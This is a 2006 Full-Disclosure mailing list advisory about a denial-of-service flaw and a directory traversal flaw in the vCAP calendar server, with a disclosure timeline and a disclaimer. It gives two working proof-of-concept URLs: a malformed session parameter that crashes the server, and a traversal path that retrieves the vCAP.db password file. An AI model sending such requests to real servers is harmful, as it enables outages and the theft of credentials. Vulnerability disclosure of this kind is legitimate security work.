[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] vCAP calendar server Multiple vulnerabilities



title: vCAP calendar server Multiple vulnerabilities

Author: securma massine <securma@xxxxxxxx>
MorX Security Research Team
http://www.morx.org

Product info : vCAP (www.pscs.co.uk)is a network calendar server for Windows. 
vCAP allows user to create calendars which can be viewed and modified by people 
on  network using a web browser. 

Original Advisory/PoC : http://www.morx.org/vcap.txt

Severity: Medium/High - user can remotely attack the server

Vulnerability Description:
v1: denial of service attack with a specific request
v2: directory traversal , any file on the system can be downloaded  ,especially 
vCAp's passwords  (vCAP.db)
 
Affected Software(s): vCAP calendar server 1.9.0 Beta and prior

Affected platform(s): Windows

Exploit/Proof of Concept:
v1- http://127.0.0.1:6100/StoresAndCalendarsList.cgi?session=%d%d%d%d%d
v2- http://127.0.0.1:6100/../Data/vCAP.db

Solution : ??

History:
16/08/2006   initial vendor contact
17/08/2006   sending vulnerability details
31/08/2006   vulnerability confirmed


Disclaimer:
this entire document is for eductional, testing and demonstrating purpose 
only.The author do not have any responsibility for any malicious use of this 
advisory or proof of concept code.





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/